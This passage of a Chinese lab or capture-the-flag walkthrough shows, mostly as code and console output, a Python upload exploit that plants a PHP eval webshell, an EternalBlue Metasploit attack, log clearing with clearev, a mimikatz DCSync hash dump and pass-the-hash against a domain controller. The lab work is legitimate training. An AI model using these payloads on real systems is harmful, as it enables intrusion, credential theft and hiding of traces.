<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line"></span><br><span class="line">url_pre = <span class="string">&#x27;http://172.22.1.18/&#x27;</span></span><br><span class="line">url1 = url_pre + <span class="string">&#x27;?a=check&amp;m=login&amp;d=&amp;ajaxbool=true&amp;rnd=533953&#x27;</span></span><br><span class="line">url2 = url_pre + <span class="string">&#x27;/index.php?a=upfile&amp;m=upload&amp;d=public&amp;maxsize=100&amp;ajaxbool=true&amp;rnd=798913&#x27;</span></span><br><span class="line">url3 = url_pre + <span class="string">&#x27;/task.php?m=qcloudCos|runt&amp;a=run&amp;fileid=11&#x27;</span></span><br><span class="line"></span><br><span class="line">data1 = &#123;</span><br><span class="line">    <span class="string">&#x27;rempass&#x27;</span>: <span class="string">&#x27;0&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;jmpass&#x27;</span>: <span class="string">&#x27;false&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;device&#x27;</span>: <span class="string">&#x27;1625884034525&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;ltype&#x27;</span>: <span class="string">&#x27;0&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;adminuser&#x27;</span>: <span class="string">&#x27;YWRtaW4=&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;adminpass&#x27;</span>: <span class="string">&#x27;YWRtaW4xMjM=&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;yanzm&#x27;</span>: <span class="string">&#x27;&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r = session.post(url1, data=data1)</span><br><span class="line">r = session.post(url2, files=&#123;<span class="string">&#x27;file&#x27;</span>: <span class="built_in">open</span>(<span class="string">&#x27;1.php&#x27;</span>, <span class="string">&#x27;r+&#x27;</span>)&#125;)</span><br><span class="line"></span><br><span class="line">filepath = <span class="built_in">str</span>(r.json()[<span class="string">&#x27;filepath&#x27;</span>])</span><br><span class="line">filepath = <span class="string">&quot;/&quot;</span> + filepath.split(<span class="string">&#x27;.uptemp&#x27;</span>)[<span class="number">0</span>] + <span class="string">&#x27;.php&#x27;</span></span><br><span class="line"><span class="built_in">id</span> = r.json()[<span class="string">&#x27;id&#x27;</span>]</span><br><span class="line"></span><br><span class="line">url3 = url_pre + <span class="string">f&#x27;/task.php?m=qcloudCos|runt&amp;a=run&amp;fileid=<span class="subst">&#123;<span class="built_in">id</span>&#125;</span>&#x27;</span></span><br><span class="line"></span><br><span class="line">r = session.get(url3)</span><br><span class="line">r = session.get(url_pre + filepath + <span class="string">&quot;?1=system(&#x27;dir&#x27;);&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure></div>
<p>相同目录下还有一个 1.php 文件存的是一句话木马<br>1.php:</p>
<div class="highlight-wrap" data-rel="Php"><figure class="iseeu highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;1&quot;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>运行后可以看到文件上传的路径</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PS D:\PenetrationW\script&gt; &amp; d:/ProgrammingLanguage/Python31/python3.exe d:/PenetrationW/script/exp.py</span><br><span class="line">&lt;br /&gt;</span><br><span class="line">&lt;b&gt;Notice&lt;/b&gt;:  Undefined offset: 1 <span class="keyword">in</span> &lt;b&gt;C:\phpStudy\PHPTutorial\WWW\upload\2024-09\22_11172620.php&lt;/b&gt; on line &lt;b&gt;1&lt;/b&gt;&lt;br /&gt;</span><br></pre></td></tr></table></figure></div>

<p>然后直接蚁剑连接(记得蚁剑也要在代理设置里面设置socks5代理)</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">C:\phpStudy\PHPTutorial\WWW\upload\2024-09&gt; <span class="built_in">whoami</span></span><br><span class="line">nt authority\system</span><br><span class="line"><span class="comment"># 可以看到已经拥有了 system 权限，我们直接在 Administrator 用户的目录下找到 flag2</span></span><br></pre></td></tr></table></figure></div>

<p>我们直接在<code>Administrator</code>用户的目录下找到 flag2</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"> ___    ___ ___  ________  ________  ________  ________  ________   ________     </span><br><span class="line">|\  \  /  /|\  \|\   __  \|\   __  \|\   __  \|\   __  \|\   ___  \|\   ____\    </span><br><span class="line">\ \  \/  / | \  \ \  \|\  \ \  \|\  \ \  \|\  \ \  \|\  \ \  \\ \  \ \  \___|    </span><br><span class="line"> \ \    / / \ \  \ \   __  \ \  \\\  \ \   _  _\ \   __  \ \  \\ \  \ \  \  ___  </span><br><span class="line">  /     \/   \ \  \ \  \ \  \ \  \\\  \ \  \\  \\ \  \ \  \ \  \\ \  \ \  \|\  \ </span><br><span class="line"> /  /\   \    \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\</span><br><span class="line">/__/ /\ __\    \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|</span><br><span class="line">|__|/ \|__|                                                                      </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">flag02: 2ce3-4813-87d4-</span><br><span class="line"></span><br><span class="line">Awesome! ! ! You found the second flag, now you can attack the domain controller.</span><br><span class="line"><span class="comment">#还提示我们最后要打DC</span></span><br></pre></td></tr></table></figure></div>

<h2 id="flag3"><a href="#flag3" class="headerlink" title="flag3"></a>flag3</h2><p>接下来我们就对<code>ip 172.22.1.21</code>进行渗透，这里需要用到渗透框架<code>Metasploit Framework</code>，kali自带这个框架，这里的攻击机我选用kali（windows也可以安装Metasploit Framework，不过上面我说过也要讲讲如何在kali设置代理）。我们首先要在<code>kali</code>中设置<code>socks5</code>代理，否则我们无法访问其内网的环境。<br>在<code>kali</code>中设置代理比<code>windows</code>简单很多，他自带了一个<code>proxychains4</code>工具，我们只需要编辑<code>etc</code>目录下的<code>proxychians4.conf</code>文件：</p>
<p>在最下面的ProxyList上加上<code>socks5 vps ip</code>端口 即可</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socks5 123.249.99.71 798</span><br></pre></td></tr></table></figure></div>

<p>然后就能在浏览器中访问靶机内网的 172.22.1.* 那三台机器了<br>在上面用 fscan 的扫描中我们发现该机子存在 MS17-010 漏洞，这个就是大名鼎鼎的永恒之蓝漏洞<br>我们先在 kali 输入<code>msfconsole</code>启动<code>Metasploit Framework</code>（后面简称 msf）</p>
<p>输入<code>search ms17-010</code>搜索<code>ms17-010</code>相关模块，可以看到一共找到了 4 个不同的模块</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[/etc]</span><br><span class="line">└─$ msfconsole</span><br><span class="line">Metasploit tip: Writing a custom module? After editing your module, why not try </span><br><span class="line">the reload <span class="built_in">command</span></span><br><span class="line">                                                  </span><br><span class="line"></span><br><span class="line">      .:okOOOkdc<span class="string">&#x27;           &#x27;</span>cdkOOOko:.                                                              </span><br><span class="line">    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                            </span><br><span class="line">   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                           </span><br><span class="line">  <span class="string">&#x27;OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO&#x27;</span>                                                          </span><br><span class="line">  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo                                                          </span><br><span class="line">  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx                                                          </span><br><span class="line">  lOOOOOOOO.         ;d;         ,OOOOOOOOl                                                          </span><br><span class="line">  .OOOOOOOO.   .;           ;    ,OOOOOOOO.                                                          </span><br><span class="line">   cOOOOOOO.   .OOc.     <span class="string">&#x27;oOO.   ,OOOOOOOc                                                           </span></span><br><span class="line"><span class="string">    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo                                                            </span></span><br><span class="line"><span class="string">     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl                                                             </span></span><br><span class="line"><span class="string">      ;OOOO&#x27;</span>   .OOOO.   :OOOO.   ;OOOO;                                                              </span><br><span class="line">       .dOOo   .OOOOocccxOOOO.   xOOd.                                                               </span><br><span class="line">         ,kOl  .OOOOOOOOOOOOO. .dOk,                                                                 </span><br><span class="line">           :kk;.OOOOOOOOOOOOO.cOk:                                                                   </span><br><span class="line">             ;kOOOOOOOOOOOOOOOk:                                                                     </span><br><span class="line">               ,xOOOOOOOOOOOx,                                                                       </span><br><span class="line">                 .lOOOOOOOl.                                                                         </span><br><span class="line">                    ,dOd,                                                                            </span><br><span class="line">                      .                                                                              </span><br><span class="line"></span><br><span class="line">       =[ metasploit v6.4.9-dev                           ]</span><br><span class="line">+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post       ]</span><br><span class="line">+ -- --=[ 1465 payloads - 47 encoders - 11 nops           ]</span><br><span class="line">+ -- --=[ 9 evasion                                       ]</span><br><span class="line"></span><br><span class="line">Metasploit Documentation: https://docs.metasploit.com/</span><br><span class="line"></span><br><span class="line">msf6 &gt; search ms17-010</span><br><span class="line"></span><br><span class="line">Matching Modules</span><br><span class="line">================</span><br><span class="line"></span><br><span class="line">   <span class="comment">#   Name                                           Disclosure Date  Rank     Check  Description</span></span><br><span class="line">   -   ----                                           ---------------  ----     -----  -----------</span><br><span class="line">   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption</span><br><span class="line">   1     \_ target: Automatic Target                  .                .        .      .</span><br><span class="line">   2     \_ target: Windows 7                         .                .        .      .</span><br><span class="line">   3     \_ target: Windows Embedded Standard 7       .                .        .      .</span><br><span class="line">   4     \_ target: Windows Server 2008 R2            .                .        .      .</span><br><span class="line">   5     \_ target: Windows 8                         .                .        .      .</span><br><span class="line">   6     \_ target: Windows 8.1                       .                .        .      .</span><br><span class="line">   7     \_ target: Windows Server 2012               .                .        .      .</span><br><span class="line">   8     \_ target: Windows 10 Pro                    .                .        .      .</span><br><span class="line">   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .</span><br><span class="line">   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution</span><br><span class="line">   11    \_ target: Automatic                         .                .        .      .</span><br><span class="line">   12    \_ target: PowerShell                        .                .        .      .</span><br><span class="line">   13    \_ target: Native upload                     .                .        .      .</span><br><span class="line">   14    \_ target: MOF upload                        .                .        .      .</span><br><span class="line">   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .</span><br><span class="line">   16    \_ AKA: ETERNALROMANCE                       .                .        .      .</span><br><span class="line">   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .</span><br><span class="line">   18    \_ AKA: ETERNALBLUE                          .                .        .      .</span><br><span class="line">   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution</span><br><span class="line">   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .</span><br><span class="line">   21    \_ AKA: ETERNALROMANCE                       .                .        .      .</span><br><span class="line">   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .</span><br><span class="line">   23    \_ AKA: ETERNALBLUE                          .                .        .      .</span><br><span class="line">   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection</span><br><span class="line">   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .</span><br><span class="line">   26    \_ AKA: ETERNALBLUE                          .                .        .      .</span><br><span class="line">   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution</span><br><span class="line">   28    \_ target: Execute payload (x64)             .                .        .      .</span><br><span class="line">   29    \_ target: Neutralize implant                .                .        .      .</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce                                                                                      </span><br><span class="line">After interacting with a module you can manually <span class="built_in">set</span> a TARGET with <span class="built_in">set</span> TARGET <span class="string">&#x27;Neutralize implant&#x27;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>这里我们选择使用第一个模块，因为他影响是版本比较多，然后接下来依次输入以下命令来发起永恒之蓝攻击：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_eternalblue  <span class="comment"># 选择使用的模块</span></span><br><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/bind_tcp_uuid  <span class="comment"># 设置payload，可以通过show payloads查看</span></span><br><span class="line"><span class="built_in">set</span> RHOSTS 172.22.1.21  <span class="comment"># 设置靶机的ip</span></span><br><span class="line">exploit  <span class="comment"># 发起攻击</span></span><br></pre></td></tr></table></figure></div>

<p>运行成功会出现<code>meterpreter&gt;</code><br>该<code>Meterpreter</code>是<code>metasploit</code>的一个扩展模块，可以调用<code>metasploit</code>的一些功能，对目标系统进行更深入的渗透，入获取屏幕、上传&#x2F;下载文件、创建持久后门等</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 介绍一些该模块常用的命令</span></span><br><span class="line">meterpreter &gt; screenshot <span class="comment"># 捕获屏幕</span></span><br><span class="line">meterpreter &gt; upload hello.txt c:// <span class="comment">#上传文件</span></span><br><span class="line">meterpreter &gt; download d://1.txt <span class="comment"># 下载文件</span></span><br><span class="line">meterpreter &gt; shell <span class="comment"># 获取cmd</span></span><br><span class="line">meterpreter &gt; clearev <span class="comment"># 清除日志</span></span><br></pre></td></tr></table></figure></div>

<p>紧接着上图，可以发现我们已经成功的打进该主机，遗憾的是该机子上并没有 flag ，也就是说我们最后的flag 在 windows DC 域控制器上面<br>接下来是进行 DCSync 攻击，这里简单解释一下：<br>首先，什么是 DCSync</p>
<blockquote>
<p>在域中，不同的域控之间，默认每隔15min就会进行一次域数据同步。当一个额外的域控想从其他域控同步数据时，额外域控会像其他域控发起请求，请求同步数据。如果需要同步的数据比较多，则会重复上述过程。DCSync就是利用这个原理，通过目录复制服务（Directory Replication Service，DRS）的GetNCChanges接口像域控发起数据同步请求，以获得指定域控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。分别是drsuapi和dsaop。<br>DCSync是mimikatz在2015年添加的一个功能，由Benjamin DELPY gentilkiwi和Vincent LE TOUX共同编写，能够用来导出域内所有用户的hash</p>
</blockquote>
<p>也就是说我们可以通过<code>DCSync</code>来导出所有用户的 hash 然后进行哈希传递攻击，要想使用 DCSync 必须获得以下任一用户的权限</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Administrators 组内的用户</span><br><span class="line">Domain Admins 组内的用户</span><br><span class="line">Enterprise Admins 组内的用户域控制器的计算机帐户</span><br></pre></td></tr></table></figure></div>

<p>现在我们回看一开始<code>fscan</code>的扫描结果</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)</span><br></pre></td></tr></table></figure></div>

<p>我们可以看到我们用永恒之蓝打下的这台机子是 enterprise 用户，也就是说满足 DCSync 攻击的条件，于是我们在 msf 中依次输入以下命令来获取用户的 hash</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">load kiwi  <span class="comment"># 调用mimikatz模块</span></span><br><span class="line">kiwi_cmd <span class="string">&quot;lsadump::dcsync /domain:xiaorang.lab /all /csv&quot;</span> <span class="built_in">exit</span>  <span class="comment"># 导出域内所有用户的信息(包括哈希值)</span></span><br></pre></td></tr></table></figure></div>

<p>下面是执行的全过程</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line">msf6 &gt; Interrupt: use the <span class="string">&#x27;exit&#x27;</span> <span class="built_in">command</span> to quit</span><br><span class="line">msf6 &gt; use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; <span class="built_in">set</span> payload windows/x64/meterpreter/bind_tcp_uuid</span><br><span class="line">payload =&gt; windows/x64/meterpreter/bind_tcp_uuid</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; <span class="built_in">set</span> RHOSTS 172.22.1.21</span><br><span class="line">RHOSTS =&gt; 172.22.1.21</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] 172.22.1.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check</span><br><span class="line">[+] 172.22.1.21:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)</span><br><span class="line">[*] 172.22.1.21:445       - Scanned 1 of 1 hosts (100% complete)</span><br><span class="line">[+] 172.22.1.21:445 - The target is vulnerable.</span><br><span class="line">[*] 172.22.1.21:445 - Connecting to target <span class="keyword">for</span> exploitation.</span><br><span class="line">[+] 172.22.1.21:445 - Connection established <span class="keyword">for</span> exploitation.</span><br><span class="line">[+] 172.22.1.21:445 - Target OS selected valid <span class="keyword">for</span> OS indicated by SMB reply</span><br><span class="line">[*] 172.22.1.21:445 - CORE raw buffer dump (53 bytes)</span><br><span class="line">[*] 172.22.1.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2</span><br><span class="line">[*] 172.22.1.21:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris</span><br><span class="line">[*] 172.22.1.21:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P</span><br><span class="line">[*] 172.22.1.21:445 - 0x00000030  61 63 6b 20 31                                   ack 1           </span><br><span class="line">[+] 172.22.1.21:445 - Target <span class="built_in">arch</span> selected valid <span class="keyword">for</span> <span class="built_in">arch</span> indicated by DCE/RPC reply</span><br><span class="line">[*] 172.22.1.21:445 - Trying exploit with 12 Groom Allocations.</span><br><span class="line">[*] 172.22.1.21:445 - Sending all but last fragment of exploit packet</span><br><span class="line">[*] 172.22.1.21:445 - Starting non-paged pool grooming</span><br><span class="line">[+] 172.22.1.21:445 - Sending SMBv2 buffers</span><br><span class="line">[+] 172.22.1.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.</span><br><span class="line">[*] 172.22.1.21:445 - Sending final SMBv2 buffers.</span><br><span class="line">[*] 172.22.1.21:445 - Sending last fragment of exploit packet!</span><br><span class="line">[*] 172.22.1.21:445 - Receiving response from exploit packet</span><br><span class="line">[+] 172.22.1.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!</span><br><span class="line">[*] 172.22.1.21:445 - Sending egg to corrupted connection.</span><br><span class="line">[*] 172.22.1.21:445 - Triggering free of corrupted buffer.</span><br><span class="line">[*] Started <span class="built_in">bind</span> TCP handler against 172.22.1.21:4444</span><br><span class="line">[*] Sending stage (201798 bytes) to 172.22.1.21</span><br><span class="line">[*] Meterpreter session 1 opened (10.0.2.15:36153 -&gt; 172.22.1.21:4444) at 2024-09-21 23:38:50 -0400</span><br><span class="line">[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</span><br><span class="line">[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</span><br><span class="line">[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</span><br><span class="line"></span><br><span class="line">meterpreter &gt; load kiwi</span><br><span class="line">Loading extension kiwi...</span><br><span class="line">  .#####.   mimikatz 2.2.0 20191125 (x64/windows)</span><br><span class="line"> .## ^ <span class="comment">##.  &quot;A La Vie, A L&#x27;Amour&quot; - (oe.eo)</span></span><br><span class="line"> <span class="comment">## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span></span><br><span class="line"> <span class="comment">## \ / ##       &gt; http://blog.gentilkiwi.com/mimikatz</span></span><br><span class="line"> <span class="string">&#x27;## v ##&#x27;</span>        Vincent LE TOUX            ( vincent.letoux@gmail.com )</span><br><span class="line">  <span class="string">&#x27;#####&#x27;</span>         &gt; http://pingcastle.com / http://mysmartlogon.com  ***/</span><br><span class="line"></span><br><span class="line">Success.</span><br><span class="line">meterpreter &gt; kiwi_cmd <span class="string">&quot;lsadump::dcsync /domain:xiaorang.lab /all /csv&quot;</span> <span class="built_in">exit</span></span><br><span class="line">[DC] <span class="string">&#x27;xiaorang.lab&#x27;</span> will be the domain</span><br><span class="line">[DC] <span class="string">&#x27;DC01.xiaorang.lab&#x27;</span> will be the DC server</span><br><span class="line">[DC] Exporting domain <span class="string">&#x27;xiaorang.lab&#x27;</span></span><br><span class="line">[rpc] Service  : ldap</span><br><span class="line">[rpc] AuthnSvc : GSS_NEGOTIATE (9)</span><br><span class="line">502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514</span><br><span class="line">1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512</span><br><span class="line">1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512</span><br><span class="line">1000    DC01$   41934ce1b8888fd75b8179e3535a983a        532480</span><br><span class="line">500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512</span><br><span class="line">1104    XIAORANG-OA01$  bd227c7ddbf221ea74dea7834815adc5        4096</span><br><span class="line">1108    XIAORANG-WIN7$  22d4977c16a5cc2277246a4ce6400bab        4096</span><br><span class="line"></span><br><span class="line">mimikatz(powershell) <span class="comment"># exit</span></span><br><span class="line">Bye!</span><br><span class="line"></span><br><span class="line">meterpreter &gt; </span><br></pre></td></tr></table></figure></div>

<p>这里我们比较关注是<code>Administrator</code>用户的 hash，接下来我们使用<code>crackmapexec</code>来进行哈希传递攻击，来实现 DC域控 上的任意命令执行，通过以下命令来获取 flag3</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~/Desktop]</span><br><span class="line">└─$ crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x <span class="string">&quot;type Users\Administrator\flag\flag03.txt&quot;</span></span><br><span class="line"></span><br><span class="line">[*] First <span class="keyword">time</span> use detected</span><br><span class="line">[*] Creating home directory structure</span><br><span class="line">[*] Creating default workspace</span><br><span class="line">[*] Initializing RDP protocol database</span><br><span class="line">[*] Initializing SSH protocol database</span><br><span class="line">[*] Initializing LDAP protocol database</span><br><span class="line">[*] Initializing FTP protocol database</span><br><span class="line">[*] Initializing WINRM protocol database</span><br><span class="line">[*] Initializing SMB protocol database</span><br><span class="line">[*] Initializing MSSQL protocol database</span><br><span class="line">[*] Copying default configuration file</span><br><span class="line">[*] Generating SSL certificate</span><br><span 